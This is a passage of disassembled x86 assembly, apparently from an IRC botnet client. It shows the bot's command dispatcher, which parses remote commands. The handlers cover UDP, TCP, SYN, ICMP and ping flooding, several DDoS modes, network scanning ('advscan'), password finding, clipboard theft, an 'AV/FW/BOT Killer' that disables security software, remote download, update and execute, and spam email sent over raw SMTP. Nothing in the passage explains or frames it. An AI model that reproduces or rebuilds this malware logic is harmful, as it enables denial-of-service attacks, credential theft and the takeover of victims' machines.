push offset aLoginList ; "-[Login List]-"
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
loc_409DEF: ; CODE XREF: sub_4089DC+13F7�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_409DF4: ; CODE XREF: sub_4089DC+145F�j
cmp byte ptr [edi], 0
lea eax, [edi+1]
jnz short loc_409E01
mov eax, offset aEmpty ; "<Empty>"
loc_409E01: ; CODE XREF: sub_4089DC+141E�j
push eax
push esi
lea eax, [ebp+var_2F0]
push offset aD_S ; "%d. %s"
push eax
call sub_414415
push 1
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_409DF4
push offset aMainLoginListC ; "[MAIN]: Login list complete."
call sub_401EFF
mov eax, [ebp+var_18]
pop ecx
loc_409E4B: ; CODE XREF: sub_4089DC+237E�j
; sub_4089DC+5000�j
mov ecx, [ebp+ebx+var_98]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_408C5A
push 8
mov edi, eax
mov esi, offset aAdvscan ; "advscan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E029
push 4
mov edi, eax
mov esi, offset aAsc ; "asc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E029
push 9
mov edi, eax
mov esi, offset aUdpflood ; "udpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DEE0
push 4
mov edi, eax
mov esi, offset aUdp ; "udp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DEE0
push 2
mov edi, eax
mov esi, offset aU ; "u"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DEE0
push 0Ah
mov edi, eax
mov esi, offset aPingflood ; "pingflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DDA6
push 5
mov edi, eax
mov esi, offset aPing_0 ; "ping"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DDA6
push 2
mov edi, eax
mov esi, offset aP ; "p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DDA6
push 9
mov edi, eax
mov esi, offset aTcpflood ; "tcpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBE5
push 4
mov edi, eax
mov esi, offset aTcp ; "tcp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBE5
push 6
mov edi, eax
mov esi, offset aEmail ; "email"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40D9EF
mov eax, [ebp+ebx+var_A4]
lea edx, [ebp+var_8CC]
sub edx, eax
loc_409F48: ; CODE XREF: sub_4089DC+1574�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_409F48
push [ebp+ebx+var_A0]
call sub_4147A2
mov esi, eax
mov eax, [ebp+ebx+var_9C]
lea edx, [ebp+var_2070]
pop ecx
sub edx, eax
loc_409F70: ; CODE XREF: sub_4089DC+159C�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_409F70
mov eax, [ebp+arg_0]
lea edx, [ebp+var_16C0]
sub edx, eax
loc_409F85: ; CODE XREF: sub_4089DC+15B1�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_409F85
push offset asc_420AE8 ; " "
push offset a_ ; "_"
push [ebp+ebx+var_94]
call sub_406650
add esp, 0Ch
lea edx, [ebp+var_1D70]
loc_409FAE: ; CODE XREF: sub_4089DC+15DA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_409FAE
lea eax, [ebp+var_2400]
push eax
push 101h
call dword_435818 ; WSAStartup
lea eax, [ebp+var_8CC]
push eax
call dword_435868 ; gethostbyname
push 6
push 1
push 2
mov ebx, eax
call dword_435808 ; socket
mov edi, eax
mov [ebp+var_D8], 2
mov eax, [ebx+0Ch]
mov eax, [eax]
mov eax, [eax]
push esi
mov [ebp+var_D4], eax
call dword_435954 ; htons
mov [ebp+var_D6], ax
lea eax, [ebp+var_1D70]
push eax
lea eax, [ebp+var_2070]
push eax
lea eax, [ebp+var_1D70]
push eax
lea eax, [ebp+var_16C0]
push eax
lea eax, [ebp+var_2070]
push eax
lea eax, [ebp+var_2800]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_414415
add esp, 1Ch
push 10h
lea eax, [ebp+var_D8]
push eax
push edi
call dword_4357C0 ; connect
xor ebx, ebx
push ebx
mov esi, 100h
push esi
lea eax, [ebp+var_1C6C]
push eax
push edi
call dword_43577C ; recv
lea eax, [ebp+var_1C6C]
lea ecx, [eax+1]
loc_40A072: ; CODE XREF: sub_4089DC+169B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40A072
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_2800]
push eax
push edi
call dword_43589C ; send
push ebx
push esi
lea eax, [ebp+var_1C6C]
push eax
push edi
call dword_43577C ; recv
push edi
call dword_435914 ; closesocket
call dword_435920 ; WSACleanup
lea eax, [ebp+var_16C0]
push eax
lea eax, [ebp+var_2F0]
push offset aEmailMessageSe ; "[EMAIL]: Message sent to %s."
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_C], ebx
jnz short loc_40A0E4
push ebx
loc_40A0C9: ; CODE XREF: sub_4089DC+3953�j
; sub_4089DC+39FC�j
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
loc_40A0DC: ; CODE XREF: sub_4089DC+313D�j
call sub_4056BF
add esp, 14h
loc_40A0E4: ; CODE XREF: sub_4089DC+16EA�j
; sub_4089DC+3125�j ...
mov esi, [ebp+arg_24]
loc_40A0E7: ; CODE XREF: sub_4089DC+3991�j
; sub_4089DC+39B4�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
pop ecx
mov eax, esi
jmp loc_408C5D
; ---------------------------------------------------------------------------
loc_40A0FB: ; CODE XREF: sub_4089DC+13EE�j
push 8
mov edi, eax
mov esi, offset aGetclip ; "getclip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFCE
push 3
mov edi, eax
mov esi, offset aGc ; "gc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFCE
push 9
mov edi, eax
mov esi, offset aFlusharp ; "flusharp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFA3
push 5
mov edi, eax
mov esi, offset aFarp ; "farp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFA3
push 9
mov edi, eax
mov esi, offset aFlushdns ; "flushdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF73
push 5
mov edi, eax
mov esi, offset aFdns ; "fdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF73
push 0Ah
mov edi, eax
mov esi, offset aCurrentip ; "currentip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF39
push 4
mov edi, eax
mov esi, offset aCip ; "cip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF39
push 0Dh
mov edi, eax
mov esi, offset aRloginserver ; "rloginserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE00
push 7
mov edi, eax
mov esi, offset aRlogin ; "rlogin"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE00
push 0Bh
mov edi, eax
mov esi, offset aHttpserver ; "httpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CC7F
push 5
mov edi, eax
mov esi, offset aHttp ; "http"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CC7F
push 0Bh
mov edi, eax
mov esi, offset aTftpserver ; "tftpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB28
push 5
mov edi, eax
mov esi, offset aTftp ; "tftp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB28
push 9
mov edi, eax
mov esi, offset aFindpass ; "findpass"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA80
push 3
mov edi, eax
mov esi, offset aFp ; "fp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA80
push 8
mov edi, eax
mov esi, offset aScanall ; "scanall"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C74B
push 3
mov edi, eax
mov esi, offset aSa ; "sa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C74B
mov ecx, [ebp+ebx+var_A4]
test ecx, ecx
mov [ebp+var_8], ecx
jz loc_408C5A
push 5
mov edi, eax
mov esi, offset aNick_0 ; "nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C726
push 2
mov edi, eax
mov esi, offset aN ; "n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C726
push 5
mov edi, eax
mov esi, offset aJoin ; "join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C702
push 2
mov edi, eax
mov esi, offset aJ ; "j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C702
push 5
mov edi, eax
mov esi, offset aPart_0 ; "part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6E8
push 3
mov edi, eax
mov esi, offset aPt ; "pt"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6E8
push 4
mov edi, eax
mov esi, offset aRaw ; "raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6B1
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6B1
push 0Bh
mov edi, eax
mov esi, offset aKillthread ; "killthread"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C5F7
push 2
mov edi, eax
mov esi, offset aK ; "k"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C5F7
push 7
mov edi, eax
mov esi, offset aC_quit ; "c_quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C549
push 4
mov edi, eax
mov esi, offset aC_q ; "c_q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C549
push 0Ah
mov edi, eax
mov esi, offset aC_rndnick ; "c_rndnick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4F8
push 5
mov edi, eax
mov esi, offset aC_rn ; "c_rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4F8
push 7
mov edi, eax
mov esi, offset aPrefix ; "prefix"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4DF
push 3
mov edi, eax
mov esi, offset aPr ; "pr"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4DF
push 5
mov edi, eax
mov esi, offset aOpen ; "open"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A9
push 2
mov edi, eax
mov esi, offset aO ; "o"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A9
push 7
mov edi, eax
mov esi, offset aServer ; "server"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C480
push 3
mov edi, eax
mov esi, offset aSe ; "se"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C480
push 4
mov edi, eax
mov esi, offset aDns ; "dns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C410
push 3
mov edi, eax
mov esi, offset aDn ; "dn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C410
push 9
mov edi, eax
mov esi, offset aKillproc ; "killproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3DD
push 3
mov edi, eax
mov esi, offset aKp ; "kp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3DD
push 0Ch
mov edi, eax
mov esi, offset aKilldelproc ; "killdelproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C395
push 4
mov edi, eax
mov esi, offset aKdp ; "kdp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C395
push 5
mov edi, eax
mov esi, offset aKill ; "kill"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C334
push 3
mov edi, eax
mov esi, offset aKi ; "ki"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C334
push 7
mov edi, eax
mov esi, offset aDelete ; "delete"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C2E2
push 4
mov edi, eax
mov esi, offset aDel ; "del"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C2E2
push 5
mov edi, eax
mov esi, offset aList_0 ; "list"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C2C2
push 3
mov edi, eax
mov esi, offset aLi ; "li"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C2C2
push 8
mov edi, eax
mov esi, offset aMirccmd ; "mirccmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C249
push 5
mov edi, eax
mov esi, offset aMirc ; "mirc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C249
push 4
mov edi, eax
mov esi, offset aCmd ; "cmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C1ED
push 3
mov edi, eax
mov esi, offset aCm ; "cm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C1ED
push 9
mov edi, eax
mov esi, offset aReadfile ; "readfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C159
push 3
mov edi, eax
mov esi, offset aRf ; "rf"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C159
push 4
mov edi, eax
mov esi, offset aNet ; "net"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40A816
xor eax, eax
cmp dword_435968, eax
jz short loc_40A59D
cmp dword_435990, eax
jz short loc_40A59D
push offset aNetFailedToLoa ; "[NET]: Failed to load advapi32.dll or n"...
jmp loc_40A80B
; ---------------------------------------------------------------------------
loc_40A59D: ; CODE XREF: sub_4089DC+1BAD�j
; sub_4089DC+1BB5�j
cmp [ebp+var_14], eax
jz loc_40C28D
mov eax, [ebp+ebx+var_A0]
and [ebp+arg_0], 0
test eax, eax
mov [ebp+var_10], eax
jz short loc_40A5C6
push eax
push [ebp+var_14]
call sub_414EE0
pop ecx
pop ecx
mov [ebp+arg_0], eax
loc_40A5C6: ; CODE XREF: sub_4089DC+1BDA�j
mov edx, [ebp+var_8]
push 6
mov edi, edx
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A634
cmp [ebp+var_10], eax
jz short loc_40A602
push [ebp+arg_0]
push 3
loc_40A5E3: ; CODE XREF: sub_4089DC+1C6D�j
; sub_4089DC+1C84�j ...
call sub_40776C
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_414415
add esp, 14h
jmp loc_40C28D
; ---------------------------------------------------------------------------
loc_40A602: ; CODE XREF: sub_4089DC+1C00�j
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_406EA7
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40A62A
push offset aNetServiceList ; "[NET]: Service list completed."
jmp loc_40C285
; ---------------------------------------------------------------------------
loc_40A62A: ; CODE XREF: sub_4089DC+1C42�j
push offset aNetServiceLi_0 ; "[NET]: Service list failed."
jmp loc_40C285
; ---------------------------------------------------------------------------
loc_40A634: ; CODE XREF: sub_4089DC+1BFB�j
push 5
mov edi, edx
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A64B
push [ebp+arg_0]
push 4
jmp short loc_40A5E3
; ---------------------------------------------------------------------------
loc_40A64B: ; CODE XREF: sub_4089DC+1C66�j
push 6
mov edi, edx
mov esi, offset aPause ; "pause"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A662
push [ebp+arg_0]
push 5
jmp short loc_40A5E3
; ---------------------------------------------------------------------------
loc_40A662: ; CODE XREF: sub_4089DC+1C7D�j
push 9
mov edi, edx
mov esi, offset aContinue ; "continue"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A67C
push [ebp+arg_0]
push 6
jmp loc_40A5E3
; ---------------------------------------------------------------------------
loc_40A67C: ; CODE XREF: sub_4089DC+1C94�j
push 7
mov edi, edx
mov esi, offset aDelete ; "delete"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A696
push [ebp+arg_0]
push 1
jmp loc_40A5E3
; ---------------------------------------------------------------------------
loc_40A696: ; CODE XREF: sub_4089DC+1CAE�j
push 6
mov edi, edx
mov esi, offset aShare ; "share"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A71A
cmp [ebp+var_10], eax
jz short loc_40A6E6
cmp [ebp+var_458], al
jz short loc_40A6BB
push eax
push [ebp+var_10]
push 1
jmp short loc_40A6C7
; ---------------------------------------------------------------------------
loc_40A6BB: ; CODE XREF: sub_4089DC+1CD5�j
push [ebp+ebx+var_9C]
push [ebp+var_10]
push 0
loc_40A6C7: ; CODE XREF: sub_4089DC+1CDD�j
call sub_4077E4
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_414415
add esp, 18h
jmp loc_40C28D
; ---------------------------------------------------------------------------
loc_40A6E6: ; CODE XREF: sub_4089DC+1CCD�j
push 0
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4078A2
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40A710
push offset aNetShareListCo ; "[NET]: Share list completed."
jmp loc_40C285
; ---------------------------------------------------------------------------
loc_40A710: ; CODE XREF: sub_4089DC+1D28�j
push offset aNetShareListFa ; "[NET]: Share list failed."
jmp loc_40C285
; ---------------------------------------------------------------------------
loc_40A71A: ; CODE XREF: sub_4089DC+1CC8�j
push 5
mov edi, edx
mov esi, offset aUser ; "user"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40A7BC
cmp [ebp+var_10], eax
jz short loc_40A788
cmp [ebp+var_458], al
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
jz short loc_40A74F
push eax
push [ebp+var_10]
push 1
jmp short loc_40A769
; ---------------------------------------------------------------------------
loc_40A74F: ; CODE XREF: sub_4089DC+1D69�j
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
jz short loc_40A762
push ebx
push [ebp+var_10]
push 0
jmp short loc_40A769
; ---------------------------------------------------------------------------
loc_40A762: ; CODE XREF: sub_4089DC+1D7C�j
push 0
push [ebp+var_10]
push 2
loc_40A769: ; CODE XREF: sub_4089DC+1D71�j
; sub_4089DC+1D84�j
call sub_4079C1
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_414415
add esp, 24h
jmp loc_40C28D
; ---------------------------------------------------------------------------
loc_40A788: ; CODE XREF: sub_4089DC+1D55�j
push 0
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_407A8B
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40A7B2
push offset aNetUserListCom ; "[NET]: User list completed."
jmp loc_40C285
; ---------------------------------------------------------------------------
loc_40A7B2: ; CODE XREF: sub_4089DC+1DCA�j
push offset aNetUserListFai ; "[NET]: User list failed."
jmp loc_40C285
; ---------------------------------------------------------------------------
loc_40A7BC: ; CODE XREF: sub_4089DC+1D4C�j
push 5
mov edi, edx
mov esi, offset aSend ; "send"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A806
cmp [ebp+var_10], eax
jz short loc_40A7FF
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4076B0
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_414415
add esp, 1Ch
jmp loc_40C28D
; ---------------------------------------------------------------------------
loc_40A7FF: ; CODE XREF: sub_4089DC+1DF3�j
push offset aNetNoMessageSp ; "[NET]: No message specified."
jmp short loc_40A80B
; ---------------------------------------------------------------------------
loc_40A806: ; CODE XREF: sub_4089DC+1DEE�j
push offset aNetCommandUnkn ; "[NET]: Command unknown."
loc_40A80B: ; CODE XREF: sub_4089DC+1BBC�j
; sub_4089DC+1E28�j
lea eax, [ebp+var_2F0]
jmp loc_40C285
; ---------------------------------------------------------------------------
loc_40A816: ; CODE XREF: sub_4089DC+1B9F�j
push 8
mov edi, eax
mov esi, offset aGethost ; "gethost"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C074
push 3
mov edi, eax
mov esi, offset aGh ; "gh"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C074
push 0Bh
mov edi, eax
mov esi, offset aAvfwkiller ; "avfwkiller"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40A944
mov edi, [ebp+var_8]
push 6
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40A917
lea eax, [ebp+var_2F0]
push offset aAvfwAvFwBotKil ; "[AVFW]: AV/FW/BOT Killer active."
push eax
call sub_414415
push [ebp+ebx+var_A0]
xor edi, edi
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
push 1
push edi
push [ebp+var_A0]
push [ebp+arg_4]
loc_40A899: ; DATA XREF: .data:0042CDA4�o
; .data:0042CDE8�o ...
call sub_4124D0
push edi
lea eax, [ebp+var_2F0]
push 1
push eax
call sub_41229A
add esp, 34h
mov esi, eax
lea eax, [ebp+var_1C]
push eax
push edi
push edi
push offset sub_4085DF
push edi
push edi
call ds:dword_42000C ; CreateThread
imul esi, 234h
cmp eax, edi
mov dword_4366B4[esi], eax
jnz short loc_40A8F0
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aAvfwFailedToSt ; "[AVFW]: Failed to start AV/FW killer th"...
push eax
call sub_414415
add esp, 0Ch
loc_40A8F0: ; CODE XREF: sub_4089DC+1EF7�j
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
cmp [ebp+var_C], edi
pop ecx
jnz loc_408C5A
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
jmp loc_40D12E
; ---------------------------------------------------------------------------
loc_40A917: ; CODE XREF: sub_4089DC+1E85�j
mov edi, [ebp+var_8]
push 5
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_408C5A
push [ebp+ebx+var_A0]
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40A944: ; CODE XREF: sub_4089DC+1E70�j
mov ecx, [ebp+ebx+var_A0]
test ecx, ecx
mov [ebp+var_10], ecx
jz loc_408C5A
push 9
mov edi, eax
mov esi, offset aAddalias ; "addalias"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C001
push 3
mov edi, eax
mov esi, offset aAa ; "aa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C001
push 8
mov edi, eax
mov esi, offset aPrivmsg_0 ; "privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF96
push 3
mov edi, eax
mov esi, offset aPm_0 ; "pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF96
push 7
mov edi, eax
mov esi, offset aAction ; "action"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF13
push 2
mov edi, eax
mov esi, offset aA_1 ; "a"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF13
push 6
mov edi, eax
mov esi, offset aCycle ; "cycle"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BEAD
push 3
mov edi, eax
mov esi, offset aCy ; "cy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BEAD
push 5
mov edi, eax
mov esi, offset aMode ; "mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE73
push 2
mov edi, eax
mov esi, offset aM ; "m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE73
push 6
mov edi, eax
mov esi, offset aC_raw ; "c_raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE04
push 4
mov edi, eax
mov esi, offset aC_r ; "c_r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE04
push 7
mov edi, eax
mov esi, offset aC_mode ; "c_mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD7E
push 4
mov edi, eax
mov esi, offset aC_m ; "c_m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD7E
push 7
mov edi, eax
mov esi, offset aC_nick ; "c_nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD0D
push 4
mov edi, eax
mov esi, offset aC_n ; "c_n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD0D
push 7
mov edi, eax
mov esi, offset aC_join ; "c_join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BCE5
push 4
mov edi, eax
mov esi, offset aC_j ; "c_j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BCE5
push 7
mov edi, eax
mov esi, offset aC_part ; "c_part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BC7F
push 4
mov edi, eax
mov esi, offset aC_p ; "c_p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BC7F
push 7
mov edi, eax
mov esi, offset aRepeat ; "repeat"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BBBB
push 3
mov edi, eax
mov esi, offset aRp ; "rp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BBBB
push 6
mov edi, eax
mov esi, offset aDelay ; "delay"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB1E
push 3
mov edi, eax
mov esi, offset aDe ; "de"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB1E
push 7
mov edi, eax
mov esi, offset aUpdate ; "update"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B95A
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B95A
push 8
mov edi, eax
mov esi, offset aExecute ; "execute"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B8B7
push 2
mov edi, eax
mov esi, offset aE ; "e"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B8B7
push 9
mov edi, eax
mov esi, offset aFindfile ; "findfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B7A7
push 3
mov edi, eax
mov esi, offset aFf ; "ff"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B7A7
push 7
mov edi, eax
mov esi, offset aRename ; "rename"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B74F
push 3
mov edi, eax
mov esi, offset aMv ; "mv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B74F
push 0Ah
mov edi, eax
mov esi, offset aIcmpflood ; "icmpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B61D
push 5
mov edi, eax
mov esi, offset aIcmp ; "icmp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B61D
mov ecx, [ebp+ebx+var_9C]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_408C5A
push 6
mov edi, eax
mov esi, offset aClone_0 ; "clone"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B52F
push 2
mov edi, eax
mov esi, offset aC ; "c"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B52F
push 9
mov edi, eax
mov esi, offset aDdos_syn ; "ddos.syn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B40C
push 9
mov edi, eax
mov esi, offset aDdos_ack ; "ddos.ack"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B40C
push 0Ch
mov edi, eax
mov esi, offset aDdos_random ; "ddos.random"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B40C
push 9
mov edi, eax
mov esi, offset aSynflood ; "synflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B31F
push 4
mov edi, eax
mov esi, offset aSyn ; "syn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B31F
push 9
mov edi, eax
mov esi, offset aDownload ; "download"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B17D
push 3
mov edi, eax
mov esi, offset aDl ; "dl"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B17D
push 9
mov edi, eax
mov esi, offset aRedirect ; "redirect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B080
push 3
mov edi, eax
mov esi, offset aRd ; "rd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B080
push 5
mov edi, eax
mov esi, offset aScan ; "scan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF8A
push 3
mov edi, eax
mov esi, offset aSc ; "sc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF8A
push 0Ah
mov edi, eax
mov esi, offset aC_privmsg ; "c_privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE94
push 5
mov edi, eax
mov esi, offset aC_pm ; "c_pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE94
push 9
mov edi, eax
mov esi, offset aC_action ; "c_action"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40AD60
push 4
mov edi, eax
mov esi, offset dword_426F78
pop ecx
xor edx, edx
repe cmpsb
jnz loc_409E4B
loc_40AD60: ; CODE XREF: sub_4089DC+236E�j
push [ebp+var_8]
call sub_4147A2
imul eax, 234h
cmp byte_4366B8[eax], 0
pop ecx
jz loc_40E4AE
mov edi, [ebp+var_14]
test edi, edi
jz loc_40E4AE
mov eax, [ebp+var_18]
lea edx, [eax+1]
loc_40AD8D: ; CODE XREF: sub_4089DC+23B6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AD8D
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_40AD9E: ; CODE XREF: sub_4089DC+23C7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AD9E
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_40ADAF: ; CODE XREF: sub_4089DC+23D8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40ADAF
push [ebp+arg_0]
sub eax, esi
add eax, ecx
